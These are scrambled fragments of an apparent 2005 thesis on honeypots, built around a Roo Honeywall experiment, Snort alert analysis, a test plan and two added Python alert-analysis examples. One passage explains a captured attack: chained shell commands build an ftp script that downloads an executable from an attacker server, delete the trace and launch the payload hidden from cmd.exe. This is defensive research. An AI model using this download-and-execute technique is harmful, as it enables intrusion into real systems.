59. ected RPC scan. So it is likely to be a scan, as it did not appear alone. Port 445 (microsoft-ds) also seems to gather a large number of alerts: Roo_Mue_Win2000 reads 14.03 % flows and 32.49 % alerts (1:2), and Roo_Mue_WinXP reads 23.46 % flows and 14.55 % alerts (3:2). Here the ratio of flows on Roo_Mue_Win2000 is less than the alerts, while on Roo_Mue_WinXP the ratio of flows is more than the ratio of alerts. This means that the alerts caused on Windows 2000 had a higher priority than on Windows XP; so this port is more critical to security on Windows 2000. Windows XP seems to be most vulnerable on port 139 (netbios-ssn): here only 6.55 % flows caused 59.43 % alerts (1:9). On Windows 2000, 1.73 % flows caused 5.58 % alerts (1:3). Looking at the values of Roo_Die shows that there is no traffic on ports 135 and 445; obviously these are blocked by the firewall. Hence it is very conspicuous that 3.85 % traffic. But it is difficult to compare that result with the preceding. The experiment at Dieburg captured data for 6 days, and the ratio of 3.85 % traffic was caused by 5 flows. Four of these flows occurred on May 26 between 6:06:36 pm and 6:06:56 pm. The fifth flow arrived on the same day, but at 01:01:00 am. It is likely that the firewall was maintained at this time. Roo_Die reads 85.37 % alerts on port 0 (broadcast). Checking the logs shows that those alerts were caused by ICMP messages. All
60. ed according to 3.3.4.
3.12.3 Execution
49. login to Walleye
50. observe flow from <hpIP> to 0.0.0.0 to port 1101 [Pass / Fail]
51. open this flow by clicking on the magnifying glass
52. Verify that the contents of this flow show the execution of ping <attIP> [Pass / Fail]
3.12.4 Verification
Verify that R012 (Sebek is running) is satisfied with step 52.
3.12.5 Results Summary
Date / Time / Pass / Fail
B.2 Packet payload example of chapter 5.3.2
61. emon: UNIX system term; a daemon is a particular class of computer program (user context) that runs in the background rather than under the direct control of a user. They provide system support services which are not directly handled by the Kernel, i.e. Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that verifies the user logging on to a Windows computer or server.
application: This can be any user-initiated program (user context) using network functions, i.e. mail client or http browser.
figure 5.4: possible networking processes
Important in regard to security are security privileges. In general we can distinguish two categories: system privileges and user privileges. System privileges are, as implied by the name, used by the system kernel and closely related services. They provide basic functioning of the operating system and communication facilities. System privileges include full access to the entire operating system. User privileges are limited to the user's working space. This includes memory, disk space and access to system functions. With these limitations it is not possible to damage the operating system or delete data which does not belong to the user. In general this also includes the privilege of installing programs or device drivers. Of course a user can be assigned single privileges, which could include installing rights, but this is configuration dependent. Another
62. eploy a Honeypot within a production system. The figure above shows the Honeypot colored orange. It is not registered in any naming servers or any other production systems, i.e. domain controller. In this way no one should know about the existence of the Honeypot. This is important, because only within a properly configured network can one assume that every packet sent to the Honeypot is suspect for an attack. If misconfigured packets arrive, the amount of false alerts will rise and the value of the Honeypot drops.
2.3.2 Production Honeypot
Production Honeypots are primarily used for detection (see 2.6.2). Typically they work as an extension to Intrusion Detection Systems, performing an advanced detection function. They also prove whether existing security functions are adequate, i.e. if a Honeypot is probed or attacked, the attacker must have found a way to the Honeypot. This could be a known way which is hard to lock, or even an unknown hole. However, measures should be taken to avoid a real attack. With the knowledge of the attack on the Honeypot it is easier to determine and close security holes. A Honeypot allows justifying the investment in a firewall. Without any evidence that there were attacks, someone from the management could assume that there are no attacks on the network. Therefore that person could suggest stopping investing in security, as there are no threats. With a Honeypot there is
63. eriment based on Scenario I triggered an average of 7 flows per minute (see appendix B.4, rec. June 12, 2005); the mailbox was soon flooded with mails. This shows that alerting mechanisms need to be adjusted according to the demands of the environment. Traffic which exceeds outbound limits can also be used as a trigger; this would add more detail to the alert. Also, protocols other than TCP or UDP should trigger an alert. The protocol value in the IP header provides this, i.e. TCP has the value 6 (decimal) and UDP 17 (decimal). Values other than those are symptoms of unknown attacks and could be used to bypass firewall rules. In case of accepted outbound traffic, the alert mechanism needs to be trained with patterns of valid traffic. But the other way round, when an attacker has found a new way to exploit vulnerabilities which are not recognized, an important alert would be missing. A solution which focuses on detecting patterns only would not be adequate.
3.7 Scenario V: knowledge education
A Honeypot needs a basic understanding of networks and protocols, i.e. the function of initiating a TCP connection with a TCP handshake [RFC 793] or the concept of subnetting [RFC 791]. But a Honeypot is also a good tool to learn, to delve into the functionality of a network and also to gain knowledge of how flaws are actually exploited.
3.7.1 Personal experience
From examining the ca
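An added example (not from the thesis or Roo) of the two extra alert triggers proposed above, outbound flows exceeding a per-hour limit and IP protocols other than TCP/UDP, run over constructed flow records; it also fires the limit alert once per hour-and-protocol window rather than per flow, so a busy Honeypot does not flood the mailbox as described. The record format, the limit values and all addresses except the Honeypot's 192.168.10.39 are constructed for this example.

```python
"""Added example, not from the thesis: the two extra alert triggers the text
proposes, run over constructed outbound/inbound flow records of the kind a
Honeywall firewall log summarizes. The record format and the per-hour
limits are constructed for the example, not Roo's own configuration."""
from collections import Counter
from datetime import datetime

# Per-protocol outbound limits per hour, in the spirit of the Honeywall's
# "Honeypot Outbound Control Limits" (constructed values, kept small).
OUTBOUND_LIMITS_PER_HOUR = {"TCP": 2, "UDP": 3, "ICMP": 10, "OTHER": 0}

# IP protocol numbers named in the text: TCP = 6, UDP = 17. Anything else
# is treated as unexpected; ICMP (1) only gets its own limit bucket.
EXPECTED_PROTOCOLS = {6, 17}
PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}

# Constructed log lines: "date time direction ip-protocol src:port dst:port"
SAMPLE_FLOWS = [
    "2005-06-12 14:03:07 OUT 6 192.168.10.39:1034 198.51.100.10:58739",
    "2005-06-12 14:03:09 OUT 6 192.168.10.39:1035 198.51.100.10:58740",
    "2005-06-12 14:05:41 OUT 6 192.168.10.39:1036 198.51.100.10:58741",  # 3rd TCP in hour 14
    "2005-06-12 14:06:00 OUT 6 192.168.10.39:1037 198.51.100.10:58742",  # still over, no new alert
    "2005-06-12 14:10:13 IN 47 198.51.100.7:0 192.168.10.39:0",          # protocol 47 (GRE)
    "2005-06-12 15:01:00 OUT 17 192.168.10.39:1038 198.51.100.53:53",     # UDP, within limit
]


def proto_name(number):
    return PROTO_NAMES.get(number, "OTHER")


def parse_flow(line):
    date, time, direction, proto, src, dst = line.split()
    return {
        "time": datetime.fromisoformat(f"{date} {time}"),
        "dir": direction,
        "proto": int(proto),
        "src": src,
        "dst": dst,
    }


def run_triggers(lines, limits=OUTBOUND_LIMITS_PER_HOUR):
    """Return the alerts in the order they fire.

    Trigger 1: an IP protocol other than TCP/UDP in any direction.
    Trigger 2: outbound flows of one protocol exceeding the hourly limit.
    The limit alert fires on the first flow over the limit in a given
    (hour, protocol) window and is then silent for that window."""
    alerts = []
    per_window = Counter()
    for line in lines:
        flow = parse_flow(line)
        if flow["proto"] not in EXPECTED_PROTOCOLS:
            alerts.append(("unexpected-protocol", flow["proto"], flow["src"], flow["dst"]))
        if flow["dir"] != "OUT":
            continue
        name = proto_name(flow["proto"])
        window = (flow["time"].strftime("%Y-%m-%d %H"), name)
        per_window[window] += 1
        if per_window[window] == limits[name] + 1:   # first flow over the limit
            alerts.append(("outbound-limit-exceeded", name, window[0], per_window[window]))
    return alerts


if __name__ == "__main__":
    for alert in run_triggers(SAMPLE_FLOWS):
        print(alert)
```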
64. ess firewall restrictions, located at the branch department in Dieburg. For the setup at FHD the Barebone computer is used. As only one physical machine is available, VMware Workstation 4.5.2 is used to emulate two virtual machines for Honeywall and Honeypot. VMware Workstation is powerful desktop virtualization software for emulating virtual PCs. The software allows users to run multiple x86-based operating systems, including Windows, Linux and NetWare, and their applications simultaneously on a single PC. The basic version allows the operation of four machines at the same time. Further, those machines can be interconnected by one or more virtual networks. Virtual machines emulate a set of hardware devices: there is audio, USB and network support. Each device can be manually added or removed by the user, i.e. for the Honeywall virtual machine audio support was removed to save resources. The guest operating system is not aware of the emulated environment, and drivers are installed as they would be on a real computer. Virtual network cards are created with two endpoints, one for the host and one for the guest operating system. Each endpoint holds its own IP; this allows establishing a connection between real and virtual environment. It is also possible to have a connection between two virtual machines. In this case it is advisable to remove the IP on the host computer, or the host might participate in the connection. On Windows XP this is realized by
65. esults sort by source packets ... 62
figure 5.24: protocol description ... 63
figure 6.1: flow with multiple alerts ... 66
1 Why do Honeypots improve network security
Honeypots turn the tables for hackers and computer security experts. While in the classical field of computer security a computer should be as secure as possible, in the realm of Honeypots the security holes are opened on purpose. In other words, Honeypots welcome hackers and other threats. The purpose of a Honeypot is to detect and learn from attacks and use that information to improve security. A network administrator obtains first-hand information about the current threats on his network. Undiscovered security holes can be protected using the information gained from a Honeypot. Wikipedia [Wikip 05] defines a Honeypot as "a trap set to detect or deflect attempts at unauthorized use of information systems". A Honeypot is a computer connected to a network. It can be used to examine vulnerabilities of the operating system or network. Depending on the setup, security holes can be studied in general or in particular. Moreover it can be used to observe activities of an individual who gained access to the Honeypot. Honeypots are a unique tool to
66. et, in this case to the file cdtime.asp. To append lines to the file the operator >> is used. The operator & is used to concatenate the eight commands. The first five commands create an ftp command script with the name cdtime.asp; it contains the IP and port of the ftp server (205.177.75.76 58739), username (whOre), password (gotfucked), transfer mode (binary), file name (kimo.exe), and finally it closes the connection (bye). Then ftp.exe is used to download the file kimo.exe; option -n specifies that automatic logon after connection establishment is suppressed. Then the script is deleted to wipe the trace. The command start is used to decouple kimo.exe from the shell and have it run in its own context. This is important, as otherwise the executable would be visible under the process context of cmd.exe. Unfortunately the ftp download did not succeed: the connection to the server was established, but the file was not downloaded. Also very interesting is that Snort did not recognize the ftp connection and did not trigger an alert. This was because all ftp-related Snort rules check for overflow attempts and do not trigger on valid ftp connections.
[figure 5.19: ftp flow. Recoverable fields: June 23rd 17:05:56, duration 00:02:02; 192.168.10.39:1034 -> 205.177.75.16:58739 TCP; FIN; Windows; 0 kB / 15 pkts and 0 kB / 10 pkts.]
Below are the ftp commands sent
67. example, scenario 4 is more secure.
5.4 Data analysis from Roo_Die and Roo_Mue
The results presented here give a short overview of attacks. Unfortunately the amount of values is rather small. Both captures from Roo_Mue were recorded within a duration of 24 hours in the same environment; different is the day of capture and the operating system on the Honeypot: the first setup used Windows 2000 and the second Windows XP (details see 4.3). The setup and the environment of Roo_Die was totally different: Roo_Mue was set up with Scenario I and IV, while Scenario II and III were the basis for Roo_Die.
[figure 5.21: results sort by flows. Bar chart; y-axis: appearance (%), x-axis: TCP/UDP port. Bar labels illegible in the scan.]
Snort defines a flow as unique when the IP protocol, source IP, source port, destination IP and destination port are the same. The above chart sorts the detected flows by their corresponding destination ports.
[figure 5.22: results sort by alerts. Bar chart; y-axis: appearance (%), x-axis: TCP/UDP port. Bar labels illegible in the scan.]
Snort triggers an alert when a rule has detected a flow which matched a predefined pattern (see figure 5.16 for an example of Snort rules). Alerts are rated with a numerical value, starting at 1 and increasing with the severity. It is poss
68. ey and Sons Inc., 2000.
Jim Norton et al.: Common Internet File System (CIFS) Technical Reference, Revision 1.0. The Storage Networking Industry Association, 2002.
author unknown: Snort User's Manual 2.3.3. Sourcefire Inc., 2005.
Lance Spitzner: Honeypots: Tracking Hackers. Addison-Wesley, 2002.
Clifford Stoll: The Cuckoo's Egg. Pocket Books, 1990.
The UPnP Forum: UPnP Device Architecture, Version 1.0. The UPnP Forum, 2000.
various authors: Wikipedia, the free encyclopedia. http://www.wikipedia.org, last request June 05, 2005.
Vinod Yegneswaran, Paul Barford, Somesh Jha: Global Intrusion Detection in the DOMINO Overlay System. University of Wisconsin-Madison, 2004.
B Appendix
B.1 List of Test Cases
1 Test Cases for a Roo Honeywall setup
1.1 Purpose
This document describes a system test plan to verify the functionality of a default installation of Roo 138, meaning no extra software or versions other than provided on the Roo 138 release are installed. This test plan assumes that the hardware on the target computer is functioning without conflicts or misconfigurations.
1.2 Setup
For all tests we will need the following setup:
1.3 Software and hardware installation
Hardware installation is documented in Roo_Setup_descr.doc. Software installation is documented in Roo_Setup_descr.doc. Honeywall configuration is documented in Roo_InitialSetup_short.doc. All software is f
69. eypot without touching the Honeypot.
snort alerts: Snort alerts summarize flows and categorize them by alerts. The alerts are detected by pattern analysis of the packets' payload. Discovered alerts are further rated by the severity of the attack with a number.
figure 5.8: log types of Roo
Most informative are the Snort alerts. They categorize the flows by classtypes and prioritize them. An example looks like this:
[1:538:14] NETBIOS SMB IPC$ unicode share access
[Classification: Generic Protocol Command Decode] [Priority: 3]
05/26-... (timestamp and addresses illegible in the scan) TCP TTL:102 TOS:0x0 ID:... IpLen:20 DgmLen:... DF
***AP*** Seq: 0x565C48BE Ack: 0xEE0A61D4 Win: 0x3EE1 TcpLen: 20
figure 5.9: Snort alert example
The numbers in the first line serve identification purposes. The first number indicates which parsing engine (in Snort terms: generator) detected the alert. The second number is the identifier for this alert (Snort ID), and the third number shows the revision of the rule. Next is a textual description of the alert; in the above example someone accessed the inter-process communication share of a Windows operating system. In the next line Snort prints a classification and a priority. The higher the priority is, the more severe the alert; in figure 5.9 a priority of 3 is low. The following figure shows a few examples of Snort classtypes.
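An added example (not from the thesis or the Honeynet Project): a parser for Snort's full-format alert header of the kind shown in figure 5.9, which then counts alerts per destination port and per flow using the five-tuple flow identity the thesis describes, so that a flow carrying more than one alert shows up directly. The alert text is constructed: addresses, timestamps and sid 1000001 are invented for the sample, while sid 538 is the page's own example rule.

```python
"""Added example, not from the thesis or the Honeynet Project: parse Snort
full-format alerts (layout of figure 5.9) and group them the way the thesis
counts, by destination port and by flow. The alert text below is
constructed: addresses, timestamps and sid 1000001 are invented."""
import re
from collections import Counter

SAMPLE_ALERTS = """\
[**] [1:538:14] NETBIOS SMB IPC$ unicode share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
05/26-20:40:42.559793 192.168.10.23:3175 -> 192.168.10.39:139 TCP TTL:102 TOS:0x0 ID:54127 IpLen:20 DgmLen:138 DF
***AP*** Seq: 0x565C48BE Ack: 0xEE0A61D4 Win: 0x3EE1 TcpLen: 20

[**] [1:1000001:1] LOCAL constructed test rule [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
05/26-20:40:43.102200 192.168.10.23:3175 -> 192.168.10.39:139 TCP TTL:102 TOS:0x0 ID:54128 IpLen:20 DgmLen:1480 DF
***A**** Seq: 0x565C4934 Ack: 0xEE0A61D4 Win: 0x3EE1 TcpLen: 20

[**] [1:1000001:1] LOCAL constructed test rule [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
05/26-21:02:11.000000 192.168.10.77:4412 -> 192.168.10.39:445 TCP TTL:128 TOS:0x0 ID:100 IpLen:20 DgmLen:60 DF
***A**** Seq: 0x00000001 Ack: 0x00000002 Win: 0x4000 TcpLen: 20
"""

# Line 1: [**] [generator:sid:rev] message [**]
_HEAD_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
# Line 2: [Classification: ...] [Priority: n]; rules without a classtype omit the first part
_CLASS_RE = re.compile(r"^(?:\[Classification: (.+?)\] )?\[Priority: (\d+)\]$")
# Line 3: timestamp src[:port] -> dst[:port] PROTO ...; ICMP alerts carry no ports
_PKT_RE = re.compile(
    r"^(\S+) (\d+\.\d+\.\d+\.\d+)(?::(\d+))? -> (\d+\.\d+\.\d+\.\d+)(?::(\d+))? (\w+)")


def parse_alerts(text):
    """Return one dict per alert block; blocks are separated by blank lines."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        if len(lines) < 3:
            continue
        head = _HEAD_RE.match(lines[0])
        cls = _CLASS_RE.match(lines[1])
        pkt = _PKT_RE.match(lines[2])
        if not (head and cls and pkt):
            continue  # not a full-format alert header: skip rather than guess
        alerts.append({
            "generator": int(head.group(1)),
            "sid": int(head.group(2)),
            "rev": int(head.group(3)),
            "msg": head.group(4),
            "classification": cls.group(1),
            "priority": int(cls.group(2)),
            "timestamp": pkt.group(1),
            "src": pkt.group(2),
            "sport": int(pkt.group(3)) if pkt.group(3) else None,
            "dst": pkt.group(4),
            "dport": int(pkt.group(5)) if pkt.group(5) else None,
            "proto": pkt.group(6),
        })
    return alerts


def flow_key(alert):
    """The thesis's flow identity: IP protocol, source IP/port, destination IP/port."""
    return (alert["proto"], alert["src"], alert["sport"], alert["dst"], alert["dport"])


def alerts_per_flow(alerts):
    """Alerts per flow; a count above 1 is the 'more than one alert per flow' case."""
    return Counter(flow_key(a) for a in alerts)


def alerts_per_dest_port(alerts):
    """Alerts per destination port, the grouping of the 'sort by alerts' chart."""
    return Counter(a["dport"] for a in alerts)


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    for key, n in alerts_per_flow(parsed).items():
        print(n, "alert(s) on flow", key)
    print(alerts_per_dest_port(parsed))
```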
70. gin is accepted [Pass / Fail]
3.8.4 Verification
Verify that R008 (Walleye activated) is satisfied with step 37.
3.8.5 Results Summary
3.9 Test Case 9: Walleye time
3.9.1 Purpose
Verify that requirement R009 has been satisfied and Walleye is displaying the chosen time.
3.9.2 Setup
Precondition: Setup is the same as in 3.8 (Walleye activated); R008 needs to be satisfied according to 3.8.
3.9.3 Execution
38. login to Walleye
39. Verify that the time displayed in the upper right corner corresponds to your chosen time [Pass / Fail]
3.9.4 Verification
Verify that R009 (Walleye time) is satisfied with step 39.
3.9.5 Results Summary
Date / Time / Pass / Fail
3.10 Test Case 10: Walleye is displaying traffic from R003
3.10.1 Purpose
Verify that requirement R010 has been satisfied and Walleye is displaying traffic from R003.
3.10.2 Setup
Precondition: Setup is the same as in 3.8 (Walleye activated); R008 needs to be satisfied according to 3.8.4.
3.10.3 Execution
40. login to Walleye
41. on start screen click on "last 1 hour"
42. on screen displaying aggregated flows select "Detailed view"
43. click button "send request"
44. verify that there is a flow from <attIP> to <hpIP> using protocol ICMP [Pass / Fail]
45. verify that there
71. 3.7 Test Case 7: Honeywall is logging traffic
3.7.1 Purpose
Verify that requirement R007 has been satisfied and the Honeypot is logging traffic from inbound and outbound traffic.
3.7.2 Setup
Precondition: Setup is the same as in 3.3 (internal IP functionality); R003 needs to be satisfied according to 3.3.4.
3.7.3 Execution
28. on Honeywall login as Root
29. enter menu
30. select 1 Status
31. select 11 Inbound Connections
32. Verify that there are 4 entries from <attIP> to <hpIP> with Protocol ICMP [Pass / Fail]
33. select 12 Outbound Connections
34. Verify that there are 4 entries from <hpIP> to <attIP> with Protocol ICMP [Pass / Fail]
3.7.4 Verification
Verify that R007 (Honeywall is logging traffic) is satisfied with steps 32 and 34.
3.7.5 Results Summary
Date / Time / Tester / Pass / Fail / Remarks
3.8 Test Case 8: Walleye activated
3.8.1 Purpose
Verify that requirement R008 has been satisfied and the Honeypot is logging traffic from inbound and outbound traffic.
3.8.2 Setup
Precondition: Setup is the same as in 3.3 (internal IP functionality); R003 needs to be satisfied according to 3.3.4.
3.8.3 Execution
35. on attacker computer open http browser, enter https://<manIP>/walleye.pl
36. on Honeywall login enter username and password
37. Verify that lo
72. he source port. In this case the variable was set in /etc/hflowd/snort/snort.conf to !80, which includes all ports from 1 to 65536 except port 80.
Rule header: indicates the direction of the traffic that the rule applies to. Here the connection must have come from the external network.
$HOME_NET: Rule header variable specifying information about the destination address. In this case the variable was set by Roo's menu to 192.168.10.0/24.
Rule header: specifies possible source ports.
msg: Rule option; tells the logging and alerting engine the message to print along with a packet dump or to an alert.
content: Rule option; allows the user to set rules that search for specific content in the packet payload and trigger a response based on that data.
classtype: Rule option; categorizes alerts into attack classes.
sid: Rule option used to uniquely identify Snort rules.
rev: Used to uniquely identify revisions of Snort rules.
figure 5.17: details of a Snort alert
A complete description of Snort rule details can be found in [Sourcefire 05]. The rule was triggered because it discovered the content "CCCCCCCCCCCC CCCCCCCCCCCC" two times. An inspection of the packet payloads shows that this happened in the fourth and fifth packet. The complete dump of the payload is attached in the appendix (see B.2). As explained in chapter 5.2.2, when overwritten, the return addre
...ible that more than one alert is triggered per flow.

[figure 5.23: results sorted by source packets. Bar chart of packets per TCP/UDP port; the axis values did not survive extraction.]

The above figure shows the ratio of bytes sent per port. In this case the values are a quantitative indication of traffic.

Port   Service        Description
135    epmap          Microsoft DCE Locator service (end point mapper for Remote Procedure Calls)
138    netbios-dgm    NETBIOS Datagram Service, used for sending messages via the command utility "net send" (RFC 1002)
445    microsoft-ds   Microsoft-DS, NETBIOS over TCP/IP (see [Microsoft 02])
137    netbios-ns     NETBIOS Name Service (RFC 1002)
53     domain         Domain Name Service (DNS) protocol (RFC 1035)
0      broadcast      used by the kernel to send broadcast messages
69     tftp           Trivial File Transfer Protocol (RFC 1350)
6667   ircd           Internet Relay Chat Protocol (RFC 1459)
80     http           Hyper Text Transfer Protocol (RFC 2616)
139    netbios-ssn    NETBIOS Session Service (RFC 1002)
1433   ms-sql-s       Microsoft SQL Server, standard port for listening for SQL queries
1434   ms-sql-m       Microsoft SQL Monitor; SQL Server uses UDP port 1434 to establish connections from SQL Server 2000 clients
figure 5.24: protocol description

Taking a
...igated in this document is the infection via network. This method uses known vulnerabilities in network software for injecting worm code (see 5.3.2).

2.2 History of Honeypots
The concept of Honeypots was first described by Clifford Stoll in 1990 [Stoll 90]. The book is a narrative based on a real story that happened to Stoll: he discovered a hacked computer and decided to learn how the intruder had gained access to the system. To track the hacker back to his origin, Stoll created a fake environment with the purpose of keeping the attacker busy. The idea was to trace the connection while the attacker was searching through prepared documents. Stoll did not call his trap a Honeypot; he just prepared a network drive with fake documents to keep the intruder on his machine. Then he used monitoring tools to trace the hacker's origin and find out how he got in.

In 1999 the idea was picked up again by the Honeynet Project [Honeynet 05], founded and led by Lance Spitzner. During years of development the Honeynet Project has published several papers on Honeypots and introduced techniques to build efficient Honeypots. The Honeynet Project is a non-profit research organization of security professionals dedicated to information security. The book "Honeypots: Tracking Hackers" [Spitzner 02] by Lance Spitzner is a standard work which describes concepts and architectures of Honeypots. It is a competent sourc
figure 5.2   internet architecture, extracted from RFC 1122 ... 43
figure 5.3   [title illegible in extraction] ... 45
figure 5.4   possible networking processes ... 45
figure 5.5   memory usage of a process ... 48
figure 5.6   stack filled with valid variables ... 50
figure 5.7   compromised stack ... 51
figure 5.8   [title illegible in extraction] ... 52
figure 5.9   Snort alert example ... 53
figure 5.10  [title illegible in extraction] ... 54
figure 5.11  screenshot of Roo's detailed flow output ... 55
figure 5.12  screenshot of Ethereal ... 55
figure 5.13  suspicious flow ... 56
figure 5.14  probe connection ... 56
figure 5.15  full alert details ... 57
figure 5.16  Snort rule for detecting shellcode ... 57
figure 5.17  details of a Snort alert ... 57
figure 5.18  extracted code ... 59
figure 5.19  [title illegible in extraction] ... 60
figure 5.20  [title illegible in extraction] ... 60
figure 5.21  results sorted by flows ... 61
figure 5.22  results sorted by [illegible] ... 62
figure 5.23  r
...ing the bad guys out. Normally this is accomplished by firewalls and well-patched systems. The value Honeypots can add to this category is small. If a random attack is performed, Honeypots can detect that attack but not prevent it, as the targets are not predictable. One case where Honeypots help with prevention is when an attacker is directly hacking into a server. In this case a Honeypot would cause the hacker to waste time on a worthless target and help prevent an attack on a production system. But this only holds if the attacker attacks the Honeypot before attacking a real server, and not the other way round. Also, if an institution publishes the information that it uses a Honeypot, this might deter attackers from hacking. But this is more in the field of psychology and too abstract to add measurable value to security.

2.6.2 Detection
Detecting intrusions in networks is similar to the function of an alarm system for protecting facilities: someone breaks into a house and an alarm goes off. In the realm of computers this is accomplished by Intrusion Detection Systems (see 5.3.2 for an example) or by programs designed to watch system logs and trigger when unauthorized activity appears.

The problems with these systems are false alarms and undetected intrusions (false positives and false negatives). A system might alert on suspicious or malicious activity even if the data was valid production traffic. Due to the high netwo
...ining credit card numbers. Here only one system is touched, and often with unknown vulnerabilities. A good example of this is the theft of 40 million credit card details at MasterCard International. On June 17, 2005 the credit card company released news [MasterCard 05] that CardSystems Solutions, a third-party processor of payment data, had encountered a security breach which potentially exposed more than 40 million cards of all brands to fraud. "It looks like a hacker gained access to CardSystems' database and installed a script that acts like a virus, searching out certain types of card transaction data," said MasterCard spokeswoman Jessica Antle (cited from [CNNMoney 05]).

Direct attacks are performed by skilled hackers; they require experience and knowledge. In contrast to the tools used for random attacks, the tools used by experienced Blackhats are not common. Often the attacker uses a tool which is not published in the Blackhat community. This increases the threat of those attacks: it is easier to prepare against well-known attacks, e.g. by teaching an IDS the signature of an XMAS scan performed with Nmap [Fyodor 05].

2.6 Security categories
To assess the value of Honeypots we will break down security into three categories as defined by Bruce Schneier in "Secrets and Lies" [Schneier 00]. Schneier breaks security into prevention, detection and response.

2.6.1 Prevention
Prevention means keep
...ion 0.6a, Microsoft Corporation, 2003.
Author unknown: Direct Hosting of SMB Over TCP/IP, Article ID 204279, Revision 3.0, Microsoft Corporation, 2003.
Dan Thompson IV, Randy McLaughlin: MS Windows NT Browser, White paper, last request June 25, 2005.
Author unknown: ISO/IEC 7498-1:1994, Open Systems Interconnection, Basic Reference Model, International Organization for Standardization, 1994.
Dirk Piester, Peter Hetzel, Andreas Bauch: Zeit- und Normalfrequenzverbreitung mit DCF77 (Time and standard frequency dissemination with DCF77), PTB-Mitteilungen 114, Heft 4, 2004.
Niels Provos: Honeyd, Virtual Honeypot, http://www.honeyd.org, Provos, 2002.
Martin Roesch: Snort, Intrusion Detection and Prevention System, http://www.snort.org, last request June 25, 2005, Sourcefire Inc.
Jon Postel (ed.): Internet Protocol, Request for Comments 791, The Internet Engineering Task Force, 1981.
Jon Postel (ed.): Transmission Control Protocol, Request for Comments 793, The Internet Engineering Task Force, 1981.
[RFC 959] J. Postel, J. K. Reynolds: File Transfer Protocol, Request for Comments 959, The Internet Engineering Task Force, 1985.
[RFC 1002] NetBIOS Working Group in the Defense Advanced Research Projects Agency: Protocol standard for a NetBIOS service on a TCP/UDP transport: Detailed specifications, Request for Comments 1002, The I
...is a flow from <hpIP> to <hpIP> using protocol ICMP. Pass / Fail
3.10.4 Verification
Verify that R010 (Walleye is displaying traffic from R003) is satisfied with steps 44 and 45.
3.10.5 Results Summary
Date | Time | Pass/Fail

3.11 Test Case 11: Honeywall sends alert messages
3.11.1 Purpose
Verify that requirement R011 has been satisfied and you are receiving alert messages.
3.11.2 Setup / Precondition
The setup is the same as in 3.4 (external IP functionality). R004 needs to be satisfied according to 3.4.4. The testing engineer needs access to the mail address configured in Roo_InitialSetup_short.doc.
3.11.3 Execution
46. Open your mail client configured with the mail address for alerting. N/A
47. Check that there is an email with the header "ALERT OUTBOUND ICMP".
48. Verify that the body of this mail contains "DST <attIP>". Pass / Fail (notice: this is the external <attIP>)
3.11.4 Verification
Verify that R011 (Honeywall sends alert messages) is satisfied with step 48.
3.11.5 Results Summary

3.12 Test Case 12: Sebek is running
3.12.1 Purpose
Verify that requirement R012 has been satisfied and you are receiving Sebek messages from your Honeypot.
3.12.2 Setup / Precondition
The setup is the same as in 3.3 (internal IP functionality). R003 needs to be satisfi
...ity with Honeypots [Provos 02]. Further, it is able to emulate different operating systems and services via configuration scripts.

4.2.3 Domino
Domino is a distributed intrusion detection system. Alerts from different IDSs are combined to reduce the overall false alarm rate. It is developed by Vinod Yegneswaran, Paul Barford and Somesh Jha. As an important component of its design it monitors dark IP addresses (see chapter 2.7). This enables efficient detection of attacks from spoofed IP sources, reduces false positives and enables attack classification and the production of timely blacklists.

4.3 Planning an experimental Honeypot
After analyzing the facts and features of the suggested solutions, Roo was chosen. It uses a real operating system with full functionality as Honeypot, while Honeyd emulates vulnerabilities and Domino monitors malicious activities only. Honeyd uses scripts to emulate behavior. This can be the behavior of an operating system or of a particular service. Of course those can be combined, but it does not emulate the entire behavior of an operating system. Patterns of behavior are defined in scripts which can be downloaded or developed on one's own. Honeyd is a low-interaction Honeypot (see chapter 2.4 for the definition). Roo uses a real operating system as Honeypot. This allows analyzing any vulnerability of the system. Therefore Roo was chosen for further examination.

Available for the experiments are three desktop compute
...l network in both directions. It is possible that the Honeypot is visible in the internal network but not from the public network: somewhere on the path to the external network a firewall blocks the Honeypot, or port forwarding is not directing traffic to the right destination. In addition to R003 this requirement needs external connectivity: routers need to be configured and firewall rules need to allow the traffic. Using tracert can help in case the Honeypot is not reachable.

R005 Honeypot is able to resolve internet DNS addresses
Need: DNS address resolution resolves names and addresses according to RFC 1035.
Ex: During one of the experiments the range of the production network was blocked, including the local DNS server. The problem was that outbound DNS traffic was denied and no name resolution was possible. To circumvent this, a firewall rule exception was created which excluded the internal DNS server from the blacklist.
Attain: Configure the DNS server address. Make sure this address is reachable.
Attacks often use DNS resolution to connect to storage hosts in order to download binaries. Without DNS functionality this is not possible and valuable traffic would stay away.

R006 Honeypot is denied access to restricted IP addresses
Need: Protect production servers from Honeypot traffic.
Ex: When a Honeywall is installed from scratch, there exists no file fencelist.txt. If it is created afterwards and n
...latforms. The experiments also revealed some unforeseen results. It was not expected that such easily detectable and traceable protocols as TFTP would be used for transferring data. The Honeynet revealed some configuration flaws at the Mühltal net: the client computers are denied UPnP services, an industry device architecture [Upnp 00] which allows clients to configure NAT routers automatically without user intervention, but obviously it was not completely deactivated.

Experimenting with Honeypots has revealed insight into current threats. Due to the results of the unprotected environments (see 5.4) one can state that it is absolutely necessary to use firewalls on desktop computers. The enormous number of attacks proves that surfing the internet without a firewall carries a high risk. Further, the experiment at Dieburg has revealed that even in a protected environment some attacks occur. Honeypots also reveal whether the threat comes from the internal network, in the case that a local computer has been infected elsewhere. This could be due to a laptop user who uses his laptop at home and in the protected environment. Further, Honeypots can help identifying industrial spying (see 2.3.2). Another fact revealed by the experiment at Mühltal was the inappropriate configuration of the UPnP service. Here the Honeypot did not detect an attack but a weak configuration. It helped in correcting the network setup.
...look at the flows and alerts for port 135 (epmap) from Roo_Mue Win2000: the port reads 53.65 flows but only 10.19 alerts; this is a ratio of approximately 5:1. Roo_Mue WinXP shows analogous values: 30.97 flows and 2.5 alerts, roughly 12:1. The ratio between flows and alerts is lower, but it points to a similar tendency. This means that many flows did not cause any alerts, or only alerts [18] of low priority.

